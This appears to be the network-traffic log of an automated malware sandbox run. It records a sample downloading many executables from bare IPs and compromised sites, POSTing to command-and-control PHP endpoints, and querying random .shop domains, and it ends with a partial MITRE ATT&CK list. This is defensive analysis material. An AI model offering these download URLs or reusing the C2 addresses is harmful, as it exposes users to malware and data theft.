Last-Modified: Mon, 19 Aug 2024 11:11:22 GMT
Connection: keep-alive
ETag: "66c3285a-22b460"
Accept-Ranges: bytes
GET

http://154.216.20.40/Office2024.exe

Remote address:

154.216.20.40:80

Request

GET /Office2024.exe HTTP/1.1
Host: 154.216.20.40

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 19 Sep 2024 04:35:23 GMT
Content-Type: application/octet-stream
Content-Length: 2868224
Last-Modified: Sat, 25 Dec 2021 18:14:17 GMT
Connection: keep-alive
ETag: "61c75f79-2bc400"
Accept-Ranges: bytes
DNS

shavar.prod.mozaws.net

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA

Response
DNS

prod.remote-settings.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

tracking-protection.prod.mozaws.net

Remote address:

8.8.8.8:53

Request

tracking-protection.prod.mozaws.net

IN AAAA

Response
GET

http://185.215.113.26/Office2024.exe

Remote address:

185.215.113.26:80

Request

GET /Office2024.exe HTTP/1.1
Host: 185.215.113.26
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 19 Sep 2024 04:35:29 GMT
Content-Type: application/x-msdos-program
Content-Length: 2868224
Connection: keep-alive
Last-Modified: Sat, 25 Dec 2021 18:14:17 GMT
ETag: "2bc400-5d3fc708c1040"
Accept-Ranges: bytes

151.101.194.49:443

https://urlhaus.abuse.ch/downloads/text_online/

tls, http

New Text Document mod.exe

8.4kB
463.1kB
174
341

HTTP Request

GET https://urlhaus.abuse.ch/downloads/text_online/

HTTP Response

200
147.45.44.104:80

http://147.45.44.104/prog/66e9359d801ce_sbgfds.exe

http

New Text Document mod.exe

686.3kB
38.6MB
14633
27641

HTTP Request

GET http://147.45.44.104/revada/66eb0d09c9f08_Gads.exe

HTTP Response

200

HTTP Request

GET http://147.45.44.104/lopsa/66eaf17e9bd9e_Softwarepaxck.exe

HTTP Response

200

HTTP Request

GET http://147.45.44.104/malesa/66eaee5323f5d_setup3.exe

HTTP Response

200

HTTP Request

GET http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe

HTTP Response

200

HTTP Request

GET http://147.45.44.104/yuop/66e9b62daa62d_xin.exe

HTTP Response

200

HTTP Request

GET http://147.45.44.104/revada/66e98ff1d44e2_crypted.exe

HTTP Response

200

HTTP Request

GET http://147.45.44.104/yuop/66e6ea133c92f_crypted.exe

HTTP Response

200

HTTP Request

GET http://147.45.44.104/yuop/66e57a08ef022_crypted.exe

HTTP Response

200

HTTP Request

GET http://147.45.44.104/revada/66e57196bb898_111.exe

HTTP Response

200

HTTP Request

GET http://147.45.44.104/revada/66e805302f63c_otr.exe

HTTP Response

200

HTTP Request

GET http://147.45.44.104/prog/66e8771a651d2_voewgngr.exe

HTTP Response

200

HTTP Request

GET http://147.45.44.104/prog/66e9359d801ce_sbgfds.exe

HTTP Response

200
185.215.113.100:80

http://185.215.113.100/doun/game.exe

http

New Text Document mod.exe

72.0kB
2.9MB
1384
2107

HTTP Request

GET http://185.215.113.100/doun/game.exe

HTTP Response

200
188.34.184.47:80

http://188.34.184.47/auto/9923765c101c3aa0fca26d109ef9ebe8/231.exe

http

New Text Document mod.exe

243.1kB
12.1MB
5023
8632

HTTP Request

GET http://188.34.184.47/auto/9923765c101c3aa0fca26d109ef9ebe8/231.exe

HTTP Response

200
185.215.113.103:80

http://185.215.113.103/e2b1563c6670f193.php

http

game.exe

819 B
585 B
7
4

HTTP Request

GET http://185.215.113.103/

HTTP Response

200

HTTP Request

POST http://185.215.113.103/e2b1563c6670f193.php

HTTP Response

200
2.22.99.85:443

https://steamcommunity.com/profiles/76561199724331900

tls, http

BitLockerToGo.exe

1.8kB
42.2kB
27
36

HTTP Request

GET https://steamcommunity.com/profiles/76561199724331900

HTTP Response

200
167.114.163.236:443

https://innovaxingenieros.com/vlsadg.exe

tls, http

New Text Document mod.exe

37.7kB
1.8MB
778
1338

HTTP Request

GET https://innovaxingenieros.com/vfagms15.exe

HTTP Response

200

HTTP Request

GET https://innovaxingenieros.com/vsfdajg16.exe

HTTP Response

200

HTTP Request

GET https://innovaxingenieros.com/lnfsda.exe

HTTP Response

200

HTTP Request

GET https://innovaxingenieros.com/vkfsags12.exe

HTTP Response

200

HTTP Request

GET https://innovaxingenieros.com/smdsg.exe

HTTP Response

200

HTTP Request

GET https://innovaxingenieros.com/vlsadg.exe

HTTP Response

200
149.154.167.99:443

https://t.me/edm0d

tls, http

RegAsm.exe

1.5kB
19.4kB
24
20

HTTP Request

GET https://t.me/edm0d

HTTP Response

200
116.202.0.195:443

tls

1.0kB
2.7kB
11
8
46.8.231.109:80

http://46.8.231.109/c4754d4f680ead72.php

http

49.7kB
1.2MB
849
840

HTTP Request

GET http://46.8.231.109/

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200

HTTP Request

GET http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll

HTTP Response

200

HTTP Request

POST http://46.8.231.109/c4754d4f680ead72.php

HTTP Response

200
2.22.99.85:443

steamcommunity.com

tls

1.6kB
42.2kB
22
36
116.202.0.195:443

tls

1.4kB
622 B
9
6
116.202.0.195:443

tls

1.5kB
2.2kB
10
7
116.202.0.195:443

tls

1.7kB
6.4kB
13
10
116.202.0.195:443

tls

1.5kB
672 B
9
6
116.202.0.195:443

tls

6.3kB
605 B
13
7
116.202.0.195:443

tls

93.7kB
2.5MB
1838
1828
116.202.0.195:443

tls

1.6kB
565 B
9
6
116.202.0.195:443

tls

1.7kB
565 B
9
6
116.202.0.195:443

tls

1.6kB
565 B
9
6
116.202.0.195:443

tls

24.6kB
707.6kB
520
515
185.166.142.21:443

bitbucket.org

tls

1.0kB
13.9kB
11
16
116.202.0.195:443

tls

21.8kB
627.8kB
459
456
3.5.28.16:443

bbuseruploads.s3.amazonaws.com

tls

175.9kB
9.0MB
3672
6575
116.202.0.195:443

tls

16.3kB
464.7kB
341
338
116.202.0.195:443

tls

9.8kB
266.6kB
199
196
116.202.0.195:443

tls

3.8kB
84.0kB
68
65
116.202.0.195:443

tls

71.1kB
2.1MB
1531
1525
116.202.0.195:443

tls

2.3kB
565 B
10
6
116.202.0.195:443

tls

1.5kB
2.8kB
10
7
116.202.0.195:443

tls

1.5kB
2.1kB
10
7
185.215.113.100:80

http://185.215.113.100/well/random.exe

http

20.0kB
947.2kB
416
682

HTTP Request

GET http://185.215.113.100/well/random.exe

HTTP Response

200
116.202.0.195:443

tls

1.6kB
565 B
9
6
193.187.174.58:80

http://193.187.174.58/search/gefox.exe

http

56.6kB
3.1MB
1190
2253

HTTP Request

GET http://193.187.174.58/search/gefox.exe

HTTP Response

200
116.202.0.195:443

tls

107.7kB
2.2kB
86
46
116.202.0.195:443

tls

1.5kB
696 B
9
6
89.42.218.72:443

epsys.ro

tls

13.3kB
1.1MB
268
768
203.175.9.144:443

nasionaltv.com

tls

24.1kB
690.8kB
503
499
193.233.48.63:80

http://193.233.48.63/rar.exe

http

2.0kB
374.7kB
43
272

HTTP Request

GET http://193.233.48.63/rar.exe

HTTP Response

200
216.58.204.78:443

www.youtube.com

tls

1.5kB
7.7kB
12
11
216.58.204.78:443

www.youtube.com

tls

2.0kB
9.7kB
14
21
34.149.97.1:443

firefox-api-proxy.cdn.mozilla.net

tls

1.8kB
12.7kB
13
17
142.250.200.46:443

consent.youtube.com

tls

897 B
6.9kB
5
7
88.221.135.105:80

http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgRsr0%2BS3EwOUB4TVRZf2dOszg%3D%3D

http

472 B
1.0kB
5
3

HTTP Request

GET http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgRsr0%2BS3EwOUB4TVRZf2dOszg%3D%3D

HTTP Response

200
116.202.0.195:443

tls

717 B
281 B
7
4
13.36.178.185:80

http://ec2-13-36-178-185.eu-west-3.compute.amazonaws.com/loader/zabardast-movie2024.mp3.exe

http

3.7kB
202.9kB
77
149

HTTP Request

GET http://ec2-13-36-178-185.eu-west-3.compute.amazonaws.com/loader/zabardast-movie2024.mp3.exe

HTTP Response

200
3.5.28.16:443

bbuseruploads.s3.amazonaws.com

tls

140.6kB
7.4MB
2914
5416
116.202.0.195:443

tls

1.6kB
525 B
8
5
116.202.0.195:443

tls

1.4kB
518 B
8
5
149.154.167.99:443

t.me

tls

1.5kB
19.2kB
23
20
116.202.0.195:443

tls

1.0kB
2.7kB
11
8
116.202.0.195:443

tls

1.4kB
622 B
9
6
116.202.0.195:443

tls

1.5kB
2.2kB
10
7
116.202.0.195:443

tls

1.7kB
6.4kB
13
10
116.202.0.195:443

tls

1.5kB
672 B
9
6
216.58.204.78:443

www.youtube.com

tls

2.9kB
64.7kB
26
63
216.58.204.78:443

www.youtube.com

tls

1.4kB
7.6kB
10
10
37.153.95.99:80

http://fallaeltro.es/vtrwh12.exe

http

7.5kB
332.3kB
141
241

HTTP Request

GET http://fallaeltro.es/vtrwh12.exe

HTTP Response

200
142.250.200.46:443

consent.youtube.com

tls

1.4kB
7.6kB
10
10
34.117.121.53:443

firefox-settings-attachments.cdn.mozilla.net

tls

1.4kB
12.5kB
14
18
216.58.212.196:443

www.google.com

tls

2.0kB
7.5kB
15
18
34.120.158.37:443

tracking-protection.cdn.mozilla.net

tls

2.6kB
62.6kB
29
55
80.88.87.245:80

http://tcgroup.it/vhrt12.exe

http

300 B
1.8kB
5
5

HTTP Request

GET http://tcgroup.it/vhrt12.exe

HTTP Response

403
144.34.158.170:999

http://144.34.158.170:999/game/qm2014chs.exe

http

200.0kB
5.4MB
2993
3870

HTTP Request

GET http://144.34.158.170:999/game/qm2014chs.exe

HTTP Response

200
34.120.158.37:443

tracking-protection.cdn.mozilla.net

tls

2.4kB
6.9kB
13
13
34.120.158.37:443

tracking-protection.cdn.mozilla.net

tls

2.5kB
18.2kB
14
23
34.120.158.37:443

tracking-protection.cdn.mozilla.net

tls

2.5kB
10.5kB
15
17
34.120.158.37:443

tracking-protection.cdn.mozilla.net

tls

3.9kB
312.9kB
44
231
116.202.0.195:443

tls

6.6kB
565 B
11
6
34.120.158.37:443

tracking-protection.cdn.mozilla.net

tls

25.9kB
1.5MB
425
1079
116.202.0.195:443

tls

717 B
281 B
7
4
154.216.20.40:80

http://154.216.20.40/Office2024.exe

http

209.0kB
5.9MB
3672
4212

HTTP Request

GET http://154.216.20.40/Channel2.exe

HTTP Response

200

HTTP Request

GET http://154.216.20.40/Office2024.exe

HTTP Response

200
216.58.204.78:443

www.youtube.com

tls

1.4kB
7.6kB
11
10
34.120.158.37:443

tracking-protection.cdn.mozilla.net

tls

2.2kB
62.6kB
20
54
34.120.158.37:443

tracking-protection.cdn.mozilla.net

tls

2.4kB
7.0kB
13
15
34.120.158.37:443

tracking-protection.cdn.mozilla.net

tls

2.5kB
18.2kB
15
23
185.215.113.26:80

http://185.215.113.26/Office2024.exe

http

18.5kB
1.4MB
376
970

HTTP Request

GET http://185.215.113.26/Office2024.exe

HTTP Response

200

8.8.8.8:53

urlhaus.abuse.ch

dns

New Text Document mod.exe

62 B
167 B
1
1

DNS Request

urlhaus.abuse.ch

DNS Response

151.101.194.49

151.101.130.49

151.101.2.49

151.101.66.49
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

49.194.101.151.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

49.194.101.151.in-addr.arpa
8.8.8.8:53

104.44.45.147.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

104.44.45.147.in-addr.arpa
8.8.8.8:53

228.249.119.40.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

228.249.119.40.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

76.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

76.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

100.113.215.185.in-addr.arpa

dns

74 B
134 B
1
1

DNS Request

100.113.215.185.in-addr.arpa
8.8.8.8:53

47.184.34.188.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

47.184.34.188.in-addr.arpa
8.8.8.8:53

103.113.215.185.in-addr.arpa

dns

74 B
134 B
1
1

DNS Request

103.113.215.185.in-addr.arpa
8.8.8.8:53

keennylrwmqlw.shop

dns

BitLockerToGo.exe

64 B
121 B
1
1

DNS Request

keennylrwmqlw.shop
8.8.8.8:53

licenseodqwmqn.shop

dns

BitLockerToGo.exe

65 B
122 B
1
1

DNS Request

licenseodqwmqn.shop
8.8.8.8:53

tendencctywop.shop

dns

BitLockerToGo.exe

64 B
121 B
1
1

DNS Request

tendencctywop.shop
8.8.8.8:53

tesecuuweqo.shop

dns

BitLockerToGo.exe

62 B
119 B
1
1

DNS Request

tesecuuweqo.shop
8.8.8.8:53

relaxatinownio.shop

dns

BitLockerToGo.exe

65 B
122 B
1
1

DNS Request

relaxatinownio.shop
8.8.8.8:53

reggwardssdqw.shop

dns

BitLockerToGo.exe

64 B
121 B
1
1

DNS Request

reggwardssdqw.shop
8.8.8.8:53

eemmbryequo.shop

dns

BitLockerToGo.exe

124 B
119 B
2
1

DNS Request

eemmbryequo.shop

DNS Request

eemmbryequo.shop
8.8.8.8:53

tryyudjasudqo.shop

dns

BitLockerToGo.exe

64 B
121 B
1
1

DNS Request

tryyudjasudqo.shop
8.8.8.8:53

steamcommunity.com

dns

BitLockerToGo.exe

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

2.22.99.85
8.8.8.8:53

tenntysjuxmz.shop

dns

BitLockerToGo.exe

63 B
120 B
1
1

DNS Request

tenntysjuxmz.shop
8.8.8.8:53

85.99.22.2.in-addr.arpa

dns

69 B
131 B
1
1

DNS Request

85.99.22.2.in-addr.arpa
8.8.8.8:53

103.169.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

103.169.127.40.in-addr.arpa
8.8.8.8:53

56.126.166.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

56.126.166.20.in-addr.arpa
8.8.8.8:53

innovaxingenieros.com

dns

New Text Document mod.exe

67 B
83 B
1
1

DNS Request

innovaxingenieros.com

DNS Response

167.114.163.236
8.8.8.8:53

236.163.114.167.in-addr.arpa

dns

74 B
103 B
1
1

DNS Request

236.163.114.167.in-addr.arpa
8.8.8.8:53

t.me

dns

RegAsm.exe

50 B
66 B
1
1

DNS Request

t.me

DNS Response

149.154.167.99
8.8.8.8:53

99.167.154.149.in-addr.arpa

dns

73 B
166 B
1
1

DNS Request

99.167.154.149.in-addr.arpa
8.8.8.8:53

22.249.124.192.in-addr.arpa

dns

73 B
113 B
1
1

DNS Request

22.249.124.192.in-addr.arpa
8.8.8.8:53

keennylrwmqlw.shop

dns

BitLockerToGo.exe

64 B
121 B
1
1

DNS Request

keennylrwmqlw.shop
8.8.8.8:53

licenseodqwmqn.shop

dns

BitLockerToGo.exe

65 B
122 B
1
1

DNS Request

licenseodqwmqn.shop
8.8.8.8:53

tendencctywop.shop

dns

BitLockerToGo.exe

128 B
121 B
2
1

DNS Request

tendencctywop.shop

DNS Request

tendencctywop.shop
8.8.8.8:53

tesecuuweqo.shop

dns

BitLockerToGo.exe

62 B
119 B
1
1

DNS Request

tesecuuweqo.shop
8.8.8.8:53

relaxatinownio.shop

dns

BitLockerToGo.exe

65 B
122 B
1
1

DNS Request

relaxatinownio.shop
8.8.8.8:53

reggwardssdqw.shop

dns

BitLockerToGo.exe

64 B
121 B
1
1

DNS Request

reggwardssdqw.shop
8.8.8.8:53

195.0.202.116.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

195.0.202.116.in-addr.arpa
8.8.8.8:53

eemmbryequo.shop

dns

BitLockerToGo.exe

62 B
119 B
1
1

DNS Request

eemmbryequo.shop
8.8.8.8:53

tryyudjasudqo.shop

dns

BitLockerToGo.exe

64 B
121 B
1
1

DNS Request

tryyudjasudqo.shop
8.8.8.8:53

109.231.8.46.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

109.231.8.46.in-addr.arpa
8.8.8.8:53

tenntysjuxmz.shop

dns

BitLockerToGo.exe

63 B
120 B
1
1

DNS Request

tenntysjuxmz.shop
8.8.8.8:53

11.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

11.227.111.52.in-addr.arpa
8.8.8.8:53

bitbucket.org

dns

59 B
107 B
1
1

DNS Request

bitbucket.org

DNS Response

185.166.142.21

185.166.142.22

185.166.142.23
8.8.8.8:53

bbuseruploads.s3.amazonaws.com

dns

76 B
254 B
1
1

DNS Request

bbuseruploads.s3.amazonaws.com

DNS Response

3.5.28.16

3.5.24.166

16.182.43.41

52.217.95.81

54.231.162.201

3.5.11.119

52.217.196.161

16.182.107.121
8.8.8.8:53

21.142.166.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

21.142.166.185.in-addr.arpa
8.8.8.8:53

16.28.5.3.in-addr.arpa

dns

68 B
102 B
1
1

DNS Request

16.28.5.3.in-addr.arpa
8.8.8.8:53

58.174.187.193.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

58.174.187.193.in-addr.arpa
8.8.8.8:53

epsys.ro

dns

54 B
70 B
1
1

DNS Request

epsys.ro

DNS Response

89.42.218.72
8.8.8.8:53

72.218.42.89.in-addr.arpa

dns

71 B
110 B
1
1

DNS Request

72.218.42.89.in-addr.arpa
8.8.8.8:53

nasionaltv.com

dns

60 B
76 B
1
1

DNS Request

nasionaltv.com

DNS Response

203.175.9.144
8.8.8.8:53

144.9.175.203.in-addr.arpa

dns

72 B
108 B
1
1

DNS Request

144.9.175.203.in-addr.arpa
8.8.8.8:53

www.youtube.com

dns

61 B
335 B
1
1

DNS Request

www.youtube.com

DNS Response

216.58.204.78

142.250.200.46

172.217.169.46

142.250.179.238

216.58.213.14

216.58.212.238

172.217.169.14

142.250.178.14

142.250.187.206

142.250.200.14

142.250.187.238

216.58.201.110

172.217.16.238

216.58.212.206

142.250.180.14
8.8.8.8:53

spocs.getpocket.com

dns

65 B
131 B
1
1

DNS Request

spocs.getpocket.com

DNS Response

34.117.188.166
8.8.8.8:53

firefox-api-proxy.cdn.mozilla.net

dns

79 B
160 B
1
1

DNS Request

firefox-api-proxy.cdn.mozilla.net

DNS Response

34.149.97.1
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

103 B
119 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

34.160.144.191
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

94 B
110 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.149.100.209
8.8.8.8:53

youtube-ui.l.google.com

dns

69 B
309 B
1
1

DNS Request

youtube-ui.l.google.com

DNS Response

142.250.200.46

216.58.213.14

142.250.179.238

216.58.201.110

172.217.16.238

216.58.204.78

142.250.187.206

142.250.187.238

216.58.212.206

216.58.212.238

172.217.169.46

142.250.178.14

142.250.180.14

172.217.169.14

142.250.200.14
216.58.204.78:443

youtube-ui.l.google.com

https

2.7kB
62.0kB
12
51
8.8.8.8:53

shavar.prod.mozaws.net

dns

68 B
116 B
1
1

DNS Request

shavar.prod.mozaws.net

DNS Response

34.208.252.120

52.12.180.143

44.235.70.79
8.8.8.8:53

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

dns

100 B
116 B
1
1

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

34.149.97.1
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

82 B
98 B
1
1

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Response

34.117.188.166
8.8.8.8:53

youtube-ui.l.google.com

dns

69 B
181 B
1
1

DNS Request

youtube-ui.l.google.com

DNS Response

2a00:1450:4009:815::200e

2a00:1450:4009:821::200e

2a00:1450:4009:81e::200e

2a00:1450:4009:820::200e
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

94 B
187 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

103 B
131 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::
8.8.8.8:53

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

dns

100 B
128 B
1
1

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

2600:1901:0:74e4::
34.149.97.1:443

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

https

1.8kB
4.4kB
5
7
8.8.8.8:53

shavar.prod.mozaws.net

dns

68 B
153 B
1
1

DNS Request

shavar.prod.mozaws.net
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

82 B
175 B
1
1

DNS Request

prod.ads.prod.webservices.mozgcp.net
8.8.8.8:53

consent.youtube.com

dns

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

142.250.200.46
8.8.8.8:53

firefox-settings-attachments.cdn.mozilla.net

dns

90 B
177 B
1
1

DNS Request

firefox-settings-attachments.cdn.mozilla.net

DNS Response

34.117.121.53
8.8.8.8:53

consent.youtube.com

dns

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

142.250.200.46
8.8.8.8:53

consent.youtube.com

dns

65 B
93 B
1
1

DNS Request

consent.youtube.com

DNS Response

2a00:1450:4009:823::200e
8.8.8.8:53

r10.o.lencr.org

dns

61 B
160 B
1
1

DNS Request

r10.o.lencr.org

DNS Response

88.221.135.105

88.221.134.89
8.8.8.8:53

firefox-settings-attachments.cdn.mozilla.net

dns

90 B
177 B
1
1

DNS Request

firefox-settings-attachments.cdn.mozilla.net

DNS Response

34.117.121.53
8.8.8.8:53

ec2-13-36-178-185.eu-west-3.compute.amazonaws.com

dns

95 B
111 B
1
1

DNS Request

ec2-13-36-178-185.eu-west-3.compute.amazonaws.com

DNS Response

13.36.178.185
8.8.8.8:53

gacan.zapto.org

dns

61 B
121 B
1
1

DNS Request

gacan.zapto.org
8.8.8.8:53

t.me

dns

RegAsm.exe

50 B
66 B
1
1

DNS Request

t.me

DNS Response

149.154.167.99
8.8.8.8:53

fallaeltro.es

dns

59 B
75 B
1
1

DNS Request

fallaeltro.es

DNS Response

37.153.95.99
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

94 B
187 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net
142.250.200.46:443

consent.youtube.com

https

1.8kB
9.3kB
6
10
8.8.8.8:53

shavar.prod.mozaws.net

dns

68 B
116 B
1
1

DNS Request

shavar.prod.mozaws.net

DNS Response

52.12.180.143

44.235.70.79

34.208.252.120
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

106 B
122 B
1
1

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.117.121.53
8.8.8.8:53

shavar.prod.mozaws.net

dns

68 B
153 B
1
1

DNS Request

shavar.prod.mozaws.net
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

106 B
199 B
1
1

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

www.google.com

dns

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

216.58.212.196
8.8.8.8:53

www.google.com

dns

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

216.58.212.196
8.8.8.8:53

tracking-protection.cdn.mozilla.net

dns

81 B
143 B
1
1

DNS Request

tracking-protection.cdn.mozilla.net

DNS Response

34.120.158.37
8.8.8.8:53

www.google.com

dns

60 B
88 B
1
1

DNS Request

www.google.com

DNS Response

2a00:1450:4009:80a::2004
8.8.8.8:53

tracking-protection.prod.mozaws.net

dns

81 B
97 B
1
1

DNS Request

tracking-protection.prod.mozaws.net

DNS Response

34.120.158.37
216.58.212.196:443

www.google.com

https

2.0kB
9.3kB
8
10
8.8.8.8:53

tcgroup.it

dns

56 B
72 B
1
1

DNS Request

tcgroup.it

DNS Response

80.88.87.245
8.8.8.8:53

tracking-protection.prod.mozaws.net

dns

81 B
166 B
1
1

DNS Request

tracking-protection.prod.mozaws.net
8.8.8.8:53

tracking-protection.cdn.mozilla.net

dns

81 B
143 B
1
1

DNS Request

tracking-protection.cdn.mozilla.net

DNS Response

34.120.158.37
8.8.8.8:53

shavar.prod.mozaws.net

dns

68 B
153 B
1
1

DNS Request

shavar.prod.mozaws.net
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

94 B
187 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

tracking-protection.prod.mozaws.net

dns

81 B
166 B
1
1

DNS Request

tracking-protection.prod.mozaws.net

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion